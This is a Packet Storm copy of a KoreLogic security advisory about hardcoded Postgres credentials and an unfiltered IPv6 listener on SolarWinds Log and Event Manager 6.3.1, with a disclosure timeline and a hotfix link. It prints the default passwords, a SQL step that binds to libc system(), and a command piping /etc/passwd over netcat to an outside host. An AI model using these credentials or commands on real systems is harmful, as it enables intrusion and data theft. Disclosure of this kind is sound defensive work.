what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Solarwinds LEM 6.3.1 Hardcoded Credentials

Solarwinds LEM 6.3.1 Hardcoded Credentials
Posted Apr 24, 2017
Authored by Matthew Bergin | Site korelogic.com

The Postgres database on Solarwinds Log and Event Manager Virtual Appliance version 6.3.1 has default hardcoded credentials. While some security measures were taken to ensure that network connectivity to the Postgres database wouldn't be possible using IPv4, the same measures were not taken for IPv6.

tags | exploit
SHA-256 | ad169956f0f3396698d40c18a3a0e55793e890d9d218704c030183521609a602

Solarwinds LEM 6.3.1 Hardcoded Credentials

Change Mirror Download
KL-001-2017-009 : Solarwinds LEM Database Listener with Hardcoded Credentials

Title: Solarwinds LEM Database Listener with Hardcoded Credentials
Advisory ID: KL-001-2017-009
Publication Date: 2017.04.24
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-009.txt


1. Vulnerability Details

Affected Vendor: Solarwinds
Affected Product: Log and Event Manager Virtual Appliance
Affected Version: v6.3.1
Platform: Embedded Linux
CWE Classification: CWE-798: Use of Hard-coded Credentials,
CWE-284: Improper Access Control
Impact: Remote Database Compromise
Attack vector: psql

2. Vulnerability Description

The Postgres database has default hardcoded credentials.
While some security measures were taken to ensure that network
connectivity to the Postgres database wouldn't be possible
using IPv4, the same measures were not taken for IPv6.

3. Technical Description

Reviewing netstat for listening services shows that the postgres
service is bound to both IPv6 and IPv6 interfaces.

--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # netstat -apn|grep postgres
tcp 0 0 0.0.0.0:5432 0.0.0.0:* LISTEN 949/postgres
tcp6 0 0 :::5432 :::* LISTEN 949/postgres
udp 0 0 127.0.0.1:58654 127.0.0.1:58654 ESTABLISHED 949/postgres
unix 2 [ ACC ] STREAM LISTENING 4622 949/postgres /var/run/postgresql/.s.PGSQL.5432

An iptables REJECT entry exists for IPv4. This prevents remote
network connectivity.

--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # iptables -L|grep postgres
REJECT tcp -- anywhere !localhost tcp dpt:postgresql reject-with icmp-port-unreachable

However, there are no entries in the ip6tables at all, and
the default policy is ACCEPT.

--(1)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # ip6tables -L
Chain INPUT (policy ACCEPT)
target prot opt source destination

Chain FORWARD (policy ACCEPT)
target prot opt source destination

Chain OUTPUT (policy ACCEPT)
target prot opt source destination

Additionally, two accounts exist with default and simple
credentials.

--(0)-[1.3.3.8]-[6.3.1]-[root@swi-lem]--
/ # head -n 5 /usr/local/contego/scripts/database/pgsql/flow.sql
CREATE ROLE trigeo WITH CREATEDB LOGIN PASSWORD 'rootme';
CREATE ROLE contego WITH CREATEDB LOGIN PASSWORD 'reports';

CREATE DATABASE alertdb WITH OWNER trigeo;
ALTER DATABASE alertdb OWNER TO trigeo;

No further testing was conducted against the Postgres
service. However, the following may be possible.

1. Connect to Postgres using hardcoded credentials over IPv6.
2. Run CREATE OR REPLACE FUNCTION which ties to system() in libc.so.6.

Example: CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS /lib/libc.so.6, system LANGUAGE C STRICT;
privSELECT system(cat /etc/passwd | nc 1.3.3.6 8080);
Example credit: http://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet

3. Run system() calls to run commands on the underlying operating system as
the postgres user.

4. Mitigation and Remediation Recommendation

The vendor has released a Hotfix to remediate this
vulnerability. Hotfix and installation instructions are
available at:

https://thwack.solarwinds.com/thread/111223

5. Credit

This vulnerability was discovered by Matt Bergin (@thatguylevel)
of KoreLogic, Inc.

6. Disclosure Timeline

2017.02.16 - KoreLogic sends vulnerability report and PoC to
Solarwinds <psirt@solarwinds.com> using PGP key
with fingerprint
A86E 0CF6 9665 0C8C 8A7C C9BA B373 8E9F 951F 918F.
2017.02.20 - Solarwinds replies that the key is no longer in
use, requests alternate communication channel.
2017.02.22 - KoreLogic submits vulnerability report and PoC to
alternate Solarwinds contact.
2017.02.23 - Solarwinds confirms receipt of vulnerability
report.
2017.04.06 - 30 business days have elapsed since Solarwinds
acknowledged receipt of vulnerability details.
2017.04.11 - Solarwinds releases hotfix and public disclosure.
2017.04.24 - KoreLogic public disclosure.

7. Proof of Concept

swi-lem$ ifconfig
eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56
inet addr:192.168.53.76 Bcast:192.168.53.255 Mask:255.255.255.0
inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:681 errors:320 dropped:0 overruns:0 frame:320
TX packets:513 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:82845 (80.9 KiB) TX bytes:59151 (57.7 KiB)

sploit$ ncat -4 192.168.53.76 5432
Ncat: Connection refused.

sploit$ ncat -6 -v fe80::5054:ff:fe12:3456%br0 5432
Ncat: Version 7.40 ( https://nmap.org/ncat )
Ncat: Connected to fe80::5054:ff:fe12:3456:5432.


The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt

Login or Register to add favorites

File Archive:

October 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Oct 1st
    10 Files
  • 2
    Oct 2nd
    0 Files
  • 3
    Oct 3rd
    12 Files
  • 4
    Oct 4th
    15 Files
  • 5
    Oct 5th
    18 Files
  • 6
    Oct 6th
    0 Files
  • 7
    Oct 7th
    0 Files
  • 8
    Oct 8th
    0 Files
  • 9
    Oct 9th
    0 Files
  • 10
    Oct 10th
    0 Files
  • 11
    Oct 11th
    0 Files
  • 12
    Oct 12th
    0 Files
  • 13
    Oct 13th
    0 Files
  • 14
    Oct 14th
    0 Files
  • 15
    Oct 15th
    0 Files
  • 16
    Oct 16th
    0 Files
  • 17
    Oct 17th
    0 Files
  • 18
    Oct 18th
    0 Files
  • 19
    Oct 19th
    0 Files
  • 20
    Oct 20th
    0 Files
  • 21
    Oct 21st
    0 Files
  • 22
    Oct 22nd
    0 Files
  • 23
    Oct 23rd
    0 Files
  • 24
    Oct 24th
    0 Files
  • 25
    Oct 25th
    0 Files
  • 26
    Oct 26th
    0 Files
  • 27
    Oct 27th
    0 Files
  • 28
    Oct 28th
    0 Files
  • 29
    Oct 29th
    0 Files
  • 30
    Oct 30th
    0 Files
  • 31
    Oct 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close